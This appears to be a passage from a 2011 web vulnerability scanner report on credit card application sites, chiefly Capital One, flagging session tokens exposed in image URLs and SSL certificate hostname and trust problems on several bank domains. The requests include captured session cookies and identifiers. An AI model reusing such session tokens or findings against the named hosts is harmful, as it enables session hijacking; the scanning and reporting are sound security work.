https://application.capitalone.com/icoreapp/images/custinfo/form_btm_bg.gif;jsessionid=RC8YN7BVng1cMLVKnzmC7K0kdLkntwlhny6bjhZy1hnlwYhpyb4b!-968881363

Request

GET /icoreapp/images/custinfo/form_btm_bg.gif;jsessionid=RC8YN7BVng1cMLVKnzmC7K0kdLkntwlhny6bjhZy1hnlwYhpyb4b!-968881363 HTTP/1.1
Host: application.capitalone.com
Connection: keep-alive
Referer: https://application.capitalone.com/icoreapp/jsp/landing.jsp?s=0011857004000XXCO31XX100000SB5XXZAFF01ZZZZ000011GA11
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=FB8DCF93533EFDA4; itc=CAPITALONE11NZZZintmktgD4; caponecc=xp1%3D_%3Achannel%3DAFF%2A20080402%3Atestgroup%3Dtg01%2A20110609; JSESSIONID=RC8YN7BVng1cMLVKnzmC7K0kdLkntwlhny6bjhZy1hnlwYhpyb4b!-968881363; WWWJSESSIONID=MzmVN7Bfq2TrrDKYkl1tkRy01YfDTTBlVnmmY5pMDCQv68GnS1Sh!1546850483!-1950669012; Regionalization=59fcb7b0C0pNz8zPi%2FNLLAFSiTk1AA%3D%3D; caponesn=60d4bfaeC0pNz8zPiyu2srBS8kssAbITc5Ss4%2FLy81JrkhMLgFRyMlDWyMxKydHNzcrIwMDCwMTASLck3cBQ18jA0NDAzMASqMHQ1NTAEgA%3D; SmallBusiness=6b4455bbcy4tLsnPTS0KTk3PTc0riXNJTUsszSmpCUktLnFOzcmJMzCqcYaqca0oSC3KTM1LToUr8%2FF38gXSmcGpxcWZ%2BXnO%2BaVAM4xAwp55KGKGNQA%3D; external_id=GAN_1000002114_SBCGAN_j31125666k112308_631528251; portal_caponecc=7d2941e5qygwjIuvKUktLkkvyi8tiCtJNzDUMjIwNDQwM7CsSc5IzMtLzYlzdHMDChpYGJgYGNUAAA%3D%3D

Response

HTTP/1.1 200 OK
Date: Fri, 17 Jun 2011 12:02:22 GMT
Server: Apache
Last-Modified: Mon, 10 Mar 2008 23:41:54 GMT
ETag: "1c858-ad-4481dbfaed480"
Accept-Ranges: bytes
Content-Length: 173
Keep-Alive: timeout=60, max=10000
Connection: Keep-Alive
Content-Type: image/gif

GIF89a..
............................!.......,......
...rH...0.I..8....`(B.0.h..l..p,.tm.x[.|....pH,....r.l:...tJ.(...v..z..+xL....4Q.n...........~.3......wu......D...... .;

7.6. https://application.capitalone.com/icoreapp/images/custinfo/form_top_bg.gif previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	https://application.capitalone.com
Path:	/icoreapp/images/custinfo/form_top_bg.gif

Issue detail

The URL in the request appears to contain a session token within the query string:

https://application.capitalone.com/icoreapp/images/custinfo/form_top_bg.gif;jsessionid=RC8YN7BVng1cMLVKnzmC7K0kdLkntwlhny6bjhZy1hnlwYhpyb4b!-968881363

Request

GET /icoreapp/images/custinfo/form_top_bg.gif;jsessionid=RC8YN7BVng1cMLVKnzmC7K0kdLkntwlhny6bjhZy1hnlwYhpyb4b!-968881363 HTTP/1.1
Host: application.capitalone.com
Connection: keep-alive
Referer: https://application.capitalone.com/icoreapp/jsp/landing.jsp?s=0011857004000XXCO31XX100000SB5XXZAFF01ZZZZ000011GA11
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=FB8DCF93533EFDA4; itc=CAPITALONE11NZZZintmktgD4; caponecc=xp1%3D_%3Achannel%3DAFF%2A20080402%3Atestgroup%3Dtg01%2A20110609; JSESSIONID=RC8YN7BVng1cMLVKnzmC7K0kdLkntwlhny6bjhZy1hnlwYhpyb4b!-968881363; WWWJSESSIONID=MzmVN7Bfq2TrrDKYkl1tkRy01YfDTTBlVnmmY5pMDCQv68GnS1Sh!1546850483!-1950669012; Regionalization=59fcb7b0C0pNz8zPi%2FNLLAFSiTk1AA%3D%3D; caponesn=60d4bfaeC0pNz8zPiyu2srBS8kssAbITc5Ss4%2FLy81JrkhMLgFRyMlDWyMxKydHNzcrIwMDCwMTASLck3cBQ18jA0NDAzMASqMHQ1NTAEgA%3D; SmallBusiness=6b4455bbcy4tLsnPTS0KTk3PTc0riXNJTUsszSmpCUktLnFOzcmJMzCqcYaqca0oSC3KTM1LToUr8%2FF38gXSmcGpxcWZ%2BXnO%2BaVAM4xAwp55KGKGNQA%3D; external_id=GAN_1000002114_SBCGAN_j31125666k112308_631528251; portal_caponecc=7d2941e5qygwjIuvKUktLkkvyi8tiCtJNzDUMjIwNDQwM7CsSc5IzMtLzYlzdHMDChpYGJgYGNUAAA%3D%3D

Response

HTTP/1.1 200 OK
Date: Fri, 17 Jun 2011 12:01:52 GMT
Server: Apache
Last-Modified: Mon, 10 Mar 2008 23:41:54 GMT
ETag: "1c859-9f-4481dbfaed480"
Accept-Ranges: bytes
Content-Length: 159
Keep-Alive: timeout=60, max=10000
Connection: Keep-Alive
Content-Type: image/gif

GIF89a..
................!.......,......
...p..............{&..H...........L..X.......
.D...L*.... .J......j..........Y.=.....]N......W.........HXhx..4....P..;

7.7. https://application.capitalone.com/icoreapp/images/custinfo/progress_step1_enter_info.gif previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	https://application.capitalone.com
Path:	/icoreapp/images/custinfo/progress_step1_enter_info.gif

Issue detail

The URL in the request appears to contain a session token within the query string:

https://application.capitalone.com/icoreapp/images/custinfo/progress_step1_enter_info.gif;jsessionid=RC8YN7BVng1cMLVKnzmC7K0kdLkntwlhny6bjhZy1hnlwYhpyb4b!-968881363

Request

GET /icoreapp/images/custinfo/progress_step1_enter_info.gif;jsessionid=RC8YN7BVng1cMLVKnzmC7K0kdLkntwlhny6bjhZy1hnlwYhpyb4b!-968881363 HTTP/1.1
Host: application.capitalone.com
Connection: keep-alive
Referer: https://application.capitalone.com/icoreapp/jsp/landing.jsp?s=0011857004000XXCO31XX100000SB5XXZAFF01ZZZZ000011GA11
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=FB8DCF93533EFDA4; itc=CAPITALONE11NZZZintmktgD4; caponecc=xp1%3D_%3Achannel%3DAFF%2A20080402%3Atestgroup%3Dtg01%2A20110609; JSESSIONID=RC8YN7BVng1cMLVKnzmC7K0kdLkntwlhny6bjhZy1hnlwYhpyb4b!-968881363; WWWJSESSIONID=MzmVN7Bfq2TrrDKYkl1tkRy01YfDTTBlVnmmY5pMDCQv68GnS1Sh!1546850483!-1950669012; Regionalization=59fcb7b0C0pNz8zPi%2FNLLAFSiTk1AA%3D%3D; caponesn=60d4bfaeC0pNz8zPiyu2srBS8kssAbITc5Ss4%2FLy81JrkhMLgFRyMlDWyMxKydHNzcrIwMDCwMTASLck3cBQ18jA0NDAzMASqMHQ1NTAEgA%3D; SmallBusiness=6b4455bbcy4tLsnPTS0KTk3PTc0riXNJTUsszSmpCUktLnFOzcmJMzCqcYaqca0oSC3KTM1LToUr8%2FF38gXSmcGpxcWZ%2BXnO%2BaVAM4xAwp55KGKGNQA%3D; external_id=GAN_1000002114_SBCGAN_j31125666k112308_631528251; portal_caponecc=7d2941e5qygwjIuvKUktLkkvyi8tiCtJNzDUMjIwNDQwM7CsSc5IzMtLzYlzdHMDChpYGJgYGNUAAA%3D%3D

Response

HTTP/1.1 200 OK
Date: Fri, 17 Jun 2011 12:00:38 GMT
Server: Apache
Last-Modified: Mon, 10 Mar 2008 23:41:58 GMT
ETag: "1c861-6ff-4481dbfebdd80"
Accept-Ranges: bytes
Content-Length: 1791
Keep-Alive: timeout=60, max=10000
Connection: Keep-Alive
Content-Type: image/gif

GIF89a.......h...:oJr.e..Go.a..]..Bj.l..k..U~.Py.S|.Mu.^...................................d..U~.......Ow.Mx....b..r..T}.\..S}...Js....l.....l..T}..L..P.Y..Dp.k..?l.?m.6e.h..Y.....X..Cn.Fr.:i.(Z.Pz.F
...[SNIP]...

7.8. https://application.capitalone.com/icoreapp/images/custinfo/title-your-business-credit-card.gif previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	https://application.capitalone.com
Path:	/icoreapp/images/custinfo/title-your-business-credit-card.gif

Issue detail

The URL in the request appears to contain a session token within the query string:

https://application.capitalone.com/icoreapp/images/custinfo/title-your-business-credit-card.gif;jsessionid=RC8YN7BVng1cMLVKnzmC7K0kdLkntwlhny6bjhZy1hnlwYhpyb4b!-968881363

Request

GET /icoreapp/images/custinfo/title-your-business-credit-card.gif;jsessionid=RC8YN7BVng1cMLVKnzmC7K0kdLkntwlhny6bjhZy1hnlwYhpyb4b!-968881363 HTTP/1.1
Host: application.capitalone.com
Connection: keep-alive
Referer: https://application.capitalone.com/icoreapp/jsp/landing.jsp?s=0011857004000XXCO31XX100000SB5XXZAFF01ZZZZ000011GA11
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=FB8DCF93533EFDA4; itc=CAPITALONE11NZZZintmktgD4; caponecc=xp1%3D_%3Achannel%3DAFF%2A20080402%3Atestgroup%3Dtg01%2A20110609; JSESSIONID=RC8YN7BVng1cMLVKnzmC7K0kdLkntwlhny6bjhZy1hnlwYhpyb4b!-968881363; WWWJSESSIONID=MzmVN7Bfq2TrrDKYkl1tkRy01YfDTTBlVnmmY5pMDCQv68GnS1Sh!1546850483!-1950669012; Regionalization=59fcb7b0C0pNz8zPi%2FNLLAFSiTk1AA%3D%3D; caponesn=60d4bfaeC0pNz8zPiyu2srBS8kssAbITc5Ss4%2FLy81JrkhMLgFRyMlDWyMxKydHNzcrIwMDCwMTASLck3cBQ18jA0NDAzMASqMHQ1NTAEgA%3D; SmallBusiness=6b4455bbcy4tLsnPTS0KTk3PTc0riXNJTUsszSmpCUktLnFOzcmJMzCqcYaqca0oSC3KTM1LToUr8%2FF38gXSmcGpxcWZ%2BXnO%2BaVAM4xAwp55KGKGNQA%3D; external_id=GAN_1000002114_SBCGAN_j31125666k112308_631528251; portal_caponecc=7d2941e5qygwjIuvKUktLkkvyi8tiCtJNzDUMjIwNDQwM7CsSc5IzMtLzYlzdHMDChpYGJgYGNUAAA%3D%3D

Response

HTTP/1.1 200 OK
Date: Fri, 17 Jun 2011 12:00:41 GMT
Server: Apache
Last-Modified: Thu, 07 Oct 2010 17:20:38 GMT
ETag: "1c86b-355-4920a1cd6a580"
Accept-Ranges: bytes
Content-Length: 853
Keep-Alive: timeout=60, max=10000
Connection: Keep-Alive
Content-Type: image/gif

GIF89a.......YYYMMM............sss............@@@......fff333................................................!.......,........... $.di...0i..p,....8.0..4...q....#..p(.O...ABeL..1.5....
...0)..04.&sa..
...[SNIP]...

7.9. https://application.capitalone.com/icoreapp/images/custinfo/title_tell_about_biz.gif previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	https://application.capitalone.com
Path:	/icoreapp/images/custinfo/title_tell_about_biz.gif

Issue detail

The URL in the request appears to contain a session token within the query string:

https://application.capitalone.com/icoreapp/images/custinfo/title_tell_about_biz.gif;jsessionid=RC8YN7BVng1cMLVKnzmC7K0kdLkntwlhny6bjhZy1hnlwYhpyb4b!-968881363

Request

GET /icoreapp/images/custinfo/title_tell_about_biz.gif;jsessionid=RC8YN7BVng1cMLVKnzmC7K0kdLkntwlhny6bjhZy1hnlwYhpyb4b!-968881363 HTTP/1.1
Host: application.capitalone.com
Connection: keep-alive
Referer: https://application.capitalone.com/icoreapp/jsp/landing.jsp?s=0011857004000XXCO31XX100000SB5XXZAFF01ZZZZ000011GA11
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=FB8DCF93533EFDA4; itc=CAPITALONE11NZZZintmktgD4; caponecc=xp1%3D_%3Achannel%3DAFF%2A20080402%3Atestgroup%3Dtg01%2A20110609; JSESSIONID=RC8YN7BVng1cMLVKnzmC7K0kdLkntwlhny6bjhZy1hnlwYhpyb4b!-968881363; WWWJSESSIONID=MzmVN7Bfq2TrrDKYkl1tkRy01YfDTTBlVnmmY5pMDCQv68GnS1Sh!1546850483!-1950669012; Regionalization=59fcb7b0C0pNz8zPi%2FNLLAFSiTk1AA%3D%3D; caponesn=60d4bfaeC0pNz8zPiyu2srBS8kssAbITc5Ss4%2FLy81JrkhMLgFRyMlDWyMxKydHNzcrIwMDCwMTASLck3cBQ18jA0NDAzMASqMHQ1NTAEgA%3D; SmallBusiness=6b4455bbcy4tLsnPTS0KTk3PTc0riXNJTUsszSmpCUktLnFOzcmJMzCqcYaqca0oSC3KTM1LToUr8%2FF38gXSmcGpxcWZ%2BXnO%2BaVAM4xAwp55KGKGNQA%3D; external_id=GAN_1000002114_SBCGAN_j31125666k112308_631528251; portal_caponecc=7d2941e5qygwjIuvKUktLkkvyi8tiCtJNzDUMjIwNDQwM7CsSc5IzMtLzYlzdHMDChpYGJgYGNUAAA%3D%3D

Response

HTTP/1.1 200 OK
Date: Fri, 17 Jun 2011 12:00:38 GMT
Server: Apache
Last-Modified: Mon, 02 Mar 2009 18:26:18 GMT
ETag: "1c876-350-46426f45b4680"
Accept-Ranges: bytes
Content-Length: 848
Keep-Alive: timeout=60, max=10000
Connection: Keep-Alive
Content-Type: image/gif

GIF89a.............???......LLLYYY......rrr...eee......333................................................!.......,........... $.d)&M........tm.......;.cHd.^....\.o...%.F..jL.0<...+.."........._;.@
...[SNIP]...

7.10. https://application.capitalone.com/icoreapp/images/custinfo/title_tell_about_yourself.gif previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	https://application.capitalone.com
Path:	/icoreapp/images/custinfo/title_tell_about_yourself.gif

Issue detail

The URL in the request appears to contain a session token within the query string:

https://application.capitalone.com/icoreapp/images/custinfo/title_tell_about_yourself.gif;jsessionid=RC8YN7BVng1cMLVKnzmC7K0kdLkntwlhny6bjhZy1hnlwYhpyb4b!-968881363

Request

GET /icoreapp/images/custinfo/title_tell_about_yourself.gif;jsessionid=RC8YN7BVng1cMLVKnzmC7K0kdLkntwlhny6bjhZy1hnlwYhpyb4b!-968881363 HTTP/1.1
Host: application.capitalone.com
Connection: keep-alive
Referer: https://application.capitalone.com/icoreapp/jsp/landing.jsp?s=0011857004000XXCO31XX100000SB5XXZAFF01ZZZZ000011GA11
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=FB8DCF93533EFDA4; itc=CAPITALONE11NZZZintmktgD4; caponecc=xp1%3D_%3Achannel%3DAFF%2A20080402%3Atestgroup%3Dtg01%2A20110609; JSESSIONID=RC8YN7BVng1cMLVKnzmC7K0kdLkntwlhny6bjhZy1hnlwYhpyb4b!-968881363; WWWJSESSIONID=MzmVN7Bfq2TrrDKYkl1tkRy01YfDTTBlVnmmY5pMDCQv68GnS1Sh!1546850483!-1950669012; Regionalization=59fcb7b0C0pNz8zPi%2FNLLAFSiTk1AA%3D%3D; caponesn=60d4bfaeC0pNz8zPiyu2srBS8kssAbITc5Ss4%2FLy81JrkhMLgFRyMlDWyMxKydHNzcrIwMDCwMTASLck3cBQ18jA0NDAzMASqMHQ1NTAEgA%3D; SmallBusiness=6b4455bbcy4tLsnPTS0KTk3PTc0riXNJTUsszSmpCUktLnFOzcmJMzCqcYaqca0oSC3KTM1LToUr8%2FF38gXSmcGpxcWZ%2BXnO%2BaVAM4xAwp55KGKGNQA%3D; external_id=GAN_1000002114_SBCGAN_j31125666k112308_631528251; portal_caponecc=7d2941e5qygwjIuvKUktLkkvyi8tiCtJNzDUMjIwNDQwM7CsSc5IzMtLzYlzdHMDChpYGJgYGNUAAA%3D%3D

Response

HTTP/1.1 200 OK
Date: Fri, 17 Jun 2011 12:01:31 GMT
Server: Apache
Last-Modified: Mon, 10 Mar 2008 23:42:02 GMT
ETag: "1c877-2fa-4481dc028e680"
Accept-Ranges: bytes
Content-Length: 762
Keep-Alive: timeout=60, max=10000
Connection: Keep-Alive
Content-Type: image/gif

GIF89a..........rrr...???...YYY...LLL.........eee......333................................................!.......,........... $.d):...l..o,.t=.$..P.......m.#r.l.....!.Z..a..uj...A....\.S.Rv..w.A.
...[SNIP]...

7.11. https://application.capitalone.com/icoreapp/images/icons/icon_secure_small.gif previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	https://application.capitalone.com
Path:	/icoreapp/images/icons/icon_secure_small.gif

Issue detail

The URL in the request appears to contain a session token within the query string:

https://application.capitalone.com/icoreapp/images/icons/icon_secure_small.gif;jsessionid=RC8YN7BVng1cMLVKnzmC7K0kdLkntwlhny6bjhZy1hnlwYhpyb4b!-968881363

Request

GET /icoreapp/images/icons/icon_secure_small.gif;jsessionid=RC8YN7BVng1cMLVKnzmC7K0kdLkntwlhny6bjhZy1hnlwYhpyb4b!-968881363 HTTP/1.1
Host: application.capitalone.com
Connection: keep-alive
Referer: https://application.capitalone.com/icoreapp/jsp/landing.jsp?s=0011857004000XXCO31XX100000SB5XXZAFF01ZZZZ000011GA11
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=FB8DCF93533EFDA4; itc=CAPITALONE11NZZZintmktgD4; caponecc=xp1%3D_%3Achannel%3DAFF%2A20080402%3Atestgroup%3Dtg01%2A20110609; JSESSIONID=RC8YN7BVng1cMLVKnzmC7K0kdLkntwlhny6bjhZy1hnlwYhpyb4b!-968881363; WWWJSESSIONID=MzmVN7Bfq2TrrDKYkl1tkRy01YfDTTBlVnmmY5pMDCQv68GnS1Sh!1546850483!-1950669012; Regionalization=59fcb7b0C0pNz8zPi%2FNLLAFSiTk1AA%3D%3D; caponesn=60d4bfaeC0pNz8zPiyu2srBS8kssAbITc5Ss4%2FLy81JrkhMLgFRyMlDWyMxKydHNzcrIwMDCwMTASLck3cBQ18jA0NDAzMASqMHQ1NTAEgA%3D; SmallBusiness=6b4455bbcy4tLsnPTS0KTk3PTc0riXNJTUsszSmpCUktLnFOzcmJMzCqcYaqca0oSC3KTM1LToUr8%2FF38gXSmcGpxcWZ%2BXnO%2BaVAM4xAwp55KGKGNQA%3D; external_id=GAN_1000002114_SBCGAN_j31125666k112308_631528251; portal_caponecc=7d2941e5qygwjIuvKUktLkkvyi8tiCtJNzDUMjIwNDQwM7CsSc5IzMtLzYlzdHMDChpYGJgYGNUAAA%3D%3D

Response

HTTP/1.1 200 OK
Date: Fri, 17 Jun 2011 12:01:56 GMT
Server: Apache
Last-Modified: Mon, 10 Mar 2008 23:42:16 GMT
ETag: "1c8af-b3-4481dc0fe8600"
Accept-Ranges: bytes
Content-Length: 179
Keep-Alive: timeout=60, max=10000
Connection: Keep-Alive
Content-Type: image/gif

GIF89a .
....555mmm444888bbbGGGXXX...............\\\.........~~~........................RRR...999UUU...333!.......,.... .
...0..%P3T.h.....3..gSG....-...s.8$.... |...sJ.Z..g..;

7.12. https://application.capitalone.com/icoreapp/images/icons/icon_tooltip.gif previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	https://application.capitalone.com
Path:	/icoreapp/images/icons/icon_tooltip.gif

Issue detail

The URL in the request appears to contain a session token within the query string:

https://application.capitalone.com/icoreapp/images/icons/icon_tooltip.gif;jsessionid=RC8YN7BVng1cMLVKnzmC7K0kdLkntwlhny6bjhZy1hnlwYhpyb4b!-968881363

Request

GET /icoreapp/images/icons/icon_tooltip.gif;jsessionid=RC8YN7BVng1cMLVKnzmC7K0kdLkntwlhny6bjhZy1hnlwYhpyb4b!-968881363 HTTP/1.1
Host: application.capitalone.com
Connection: keep-alive
Referer: https://application.capitalone.com/icoreapp/jsp/landing.jsp?s=0011857004000XXCO31XX100000SB5XXZAFF01ZZZZ000011GA11
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=FB8DCF93533EFDA4; itc=CAPITALONE11NZZZintmktgD4; caponecc=xp1%3D_%3Achannel%3DAFF%2A20080402%3Atestgroup%3Dtg01%2A20110609; JSESSIONID=RC8YN7BVng1cMLVKnzmC7K0kdLkntwlhny6bjhZy1hnlwYhpyb4b!-968881363; WWWJSESSIONID=MzmVN7Bfq2TrrDKYkl1tkRy01YfDTTBlVnmmY5pMDCQv68GnS1Sh!1546850483!-1950669012; Regionalization=59fcb7b0C0pNz8zPi%2FNLLAFSiTk1AA%3D%3D; caponesn=60d4bfaeC0pNz8zPiyu2srBS8kssAbITc5Ss4%2FLy81JrkhMLgFRyMlDWyMxKydHNzcrIwMDCwMTASLck3cBQ18jA0NDAzMASqMHQ1NTAEgA%3D; SmallBusiness=6b4455bbcy4tLsnPTS0KTk3PTc0riXNJTUsszSmpCUktLnFOzcmJMzCqcYaqca0oSC3KTM1LToUr8%2FF38gXSmcGpxcWZ%2BXnO%2BaVAM4xAwp55KGKGNQA%3D; external_id=GAN_1000002114_SBCGAN_j31125666k112308_631528251; portal_caponecc=7d2941e5qygwjIuvKUktLkkvyi8tiCtJNzDUMjIwNDQwM7CsSc5IzMtLzYlzdHMDChpYGJgYGNUAAA%3D%3D

Response

HTTP/1.1 200 OK
Date: Fri, 17 Jun 2011 12:01:38 GMT
Server: Apache
Last-Modified: Mon, 10 Mar 2008 23:42:16 GMT
ETag: "1c8b0-eb-4481dc0fe8600"
Accept-Ranges: bytes
Content-Length: 235
Keep-Alive: timeout=60, max=10000
Connection: Keep-Alive
Content-Type: image/gif

GIF89a........c....}...............b................ e~......................d..b..b..b..c..b..d..d..c..c....!.......,..........h .4].y....'rZ...`...XU.u..'P(t...Gc.t......`V.....&......x.)pC..4....9
...[SNIP]...

8. SSL certificate previous next
There are 13 instances of this issue:

https://applynowdc1.chase.com/
https://applynowdc2.chase.com/
https://wtp101.com/
https://application.capitalone.com/
https://applynow.chase.com/
https://creditcards.citi.com/
https://online.citibank.com/
https://www.accountonline.com/
https://www.applyonlinenow.com/
https://www.citicards.com/
https://www.discovercard.com/
https://www201.americanexpress.com/
https://www262.americanexpress.com/

Issue background

SSL helps to protect the confidentiality and integrity of information in transit between the browser and server, and to provide authentication of the server's identity. To serve this purpose, the server must present an SSL certificate which is valid for the server's hostname, is issued by a trusted authority and is valid for the current date. If any one of these requirements is not met, SSL connections to the server will not provide the full protection for which SSL is designed.

It should be noted that various attacks exist against SSL in general, and in the context of HTTPS web connections. It may be possible for a determined and suitably-positioned attacker to compromise SSL connections without user detection even when a valid SSL certificate is used.

8.1. https://applynowdc1.chase.com/ previous next

Summary

Severity:	Medium
Confidence:	Certain
Host:	https://applynowdc1.chase.com
Path:	/

Issue detail

The following problem was identified with the server's SSL certificate:

The server's certificate is not valid for the server's hostname.

The server presented the following certificates:

Server certificate

Issued to:	applynow.chase.com
Issued by:	VeriSign Class 3 International Server CA - G3
Valid from:	Mon Oct 25 19:00:00 CDT 2010
Valid to:	Wed Oct 26 18:59:59 CDT 2011

Certificate chain #1

Issued to:	VeriSign Class 3 International Server CA - G3
Issued by:	VeriSign Class 3 Public Primary Certification Authority - G5
Valid from:	Sun Feb 07 18:00:00 CST 2010
Valid to:	Fri Feb 07 17:59:59 CST 2020

Certificate chain #2

Issued to:	VeriSign Class 3 Public Primary Certification Authority - G5
Issued by:	VeriSign Class 3 Public Primary Certification Authority - G5
Valid from:	Tue Nov 07 18:00:00 CST 2006
Valid to:	Wed Jul 16 18:59:59 CDT 2036

Certificate chain #3

Issued to:	VeriSign Class 3 Public Primary Certification Authority - G5
Issued by:	VeriSign Class 3 Public Primary Certification Authority - G5
Valid from:	Tue Nov 07 18:00:00 CST 2006
Valid to:	Wed Jul 16 18:59:59 CDT 2036

8.2. https://applynowdc2.chase.com/ previous next

Summary

Severity:	Medium
Confidence:	Certain
Host:	https://applynowdc2.chase.com
Path:	/

Issue detail

The following problem was identified with the server's SSL certificate:

The server's certificate is not valid for the server's hostname.

The server presented the following certificates:

Server certificate

Issued to:	applynow.chase.com
Issued by:	VeriSign Class 3 International Server CA - G3
Valid from:	Mon Oct 25 19:00:00 CDT 2010
Valid to:	Wed Oct 26 18:59:59 CDT 2011

Certificate chain #1

Issued to:	VeriSign Class 3 International Server CA - G3
Issued by:	VeriSign Class 3 Public Primary Certification Authority - G5
Valid from:	Sun Feb 07 18:00:00 CST 2010
Valid to:	Fri Feb 07 17:59:59 CST 2020

Certificate chain #2

Issued to:	VeriSign Class 3 Public Primary Certification Authority - G5
Issued by:	VeriSign Class 3 Public Primary Certification Authority - G5
Valid from:	Tue Nov 07 18:00:00 CST 2006
Valid to:	Wed Jul 16 18:59:59 CDT 2036

Certificate chain #3

Issued to:	VeriSign Class 3 Public Primary Certification Authority - G5
Issued by:	VeriSign Class 3 Public Primary Certification Authority - G5
Valid from:	Tue Nov 07 18:00:00 CST 2006
Valid to:	Wed Jul 16 18:59:59 CDT 2036

8.3. https://wtp101.com/ previous next

Summary

Severity:	Medium
Confidence:	Certain
Host:	https://wtp101.com
Path:	/

Issue detail

The following problems were identified with the server's SSL certificate:

The server's certificate is not valid for the server's hostname.
The server's certificate is not trusted.

The server presented the following certificate:

Issued to:	CN=admin1.adnetik.iponweb.net
Issued by:	CN=admin1.adnetik.iponweb.net
Valid from:	Sun Jun 06 07:11:25 CDT 2010
Valid to:	Wed Jun 03 07:11:25 CDT 2020

8.4. https://application.capitalone.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://application.capitalone.com
Path:	/

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:	application.capitalone.com
Issued by:	www.verisign.com/CPS Incorp.by Ref. LIABILITY LTD.(c)97 VeriSign
Valid from:	Tue Sep 28 19:00:00 CDT 2010
Valid to:	Wed Nov 19 17:59:59 CST 2014

Certificate chain #1

Issued to:	www.verisign.com/CPS Incorp.by Ref. LIABILITY LTD.(c)97 VeriSign
Issued by:	Class 3 Public Primary Certification Authority
Valid from:	Wed Apr 16 19:00:00 CDT 1997
Valid to:	Mon Oct 24 18:59:59 CDT 2011

Certificate chain #2

Issued to:	Class 3 Public Primary Certification Authority
Issued by:	Class 3 Public Primary Certification Authority
Valid from:	Sun Jan 28 18:00:00 CST 1996
Valid to:	Wed Aug 02 18:59:59 CDT 2028

8.5. https://applynow.chase.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://applynow.chase.com
Path:	/

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:	applynow.chase.com
Issued by:	VeriSign Class 3 International Server CA - G3
Valid from:	Mon Oct 25 19:00:00 CDT 2010
Valid to:	Wed Oct 26 18:59:59 CDT 2011

Certificate chain #1

Issued to:	VeriSign Class 3 International Server CA - G3
Issued by:	VeriSign Class 3 Public Primary Certification Authority - G5
Valid from:	Sun Feb 07 18:00:00 CST 2010
Valid to:	Fri Feb 07 17:59:59 CST 2020

Certificate chain #2

Issued to:	VeriSign Class 3 Public Primary Certification Authority - G5
Issued by:	VeriSign Class 3 Public Primary Certification Authority - G5
Valid from:	Tue Nov 07 18:00:00 CST 2006
Valid to:	Wed Jul 16 18:59:59 CDT 2036

Certificate chain #3

Issued to:	VeriSign Class 3 Public Primary Certification Authority - G5
Issued by:	VeriSign Class 3 Public Primary Certification Authority - G5
Valid from:	Tue Nov 07 18:00:00 CST 2006
Valid to:	Wed Jul 16 18:59:59 CDT 2036

8.6. https://creditcards.citi.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://creditcards.citi.com
Path:	/

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:	creditcards.citi.com
Issued by:	VeriSign Class 3 Extended Validation SSL SGC CA
Valid from:	Thu Jul 22 19:00:00 CDT 2010
Valid to:	Sun Jul 22 18:59:59 CDT 2012

Certificate chain #1

Issued to:	VeriSign Class 3 Extended Validation SSL SGC CA
Issued by:	VeriSign Class 3 Public Primary Certification Authority - G5
Valid from:	Tue Nov 07 18:00:00 CST 2006
Valid to:	Mon Nov 07 17:59:59 CST 2016

Certificate chain #2

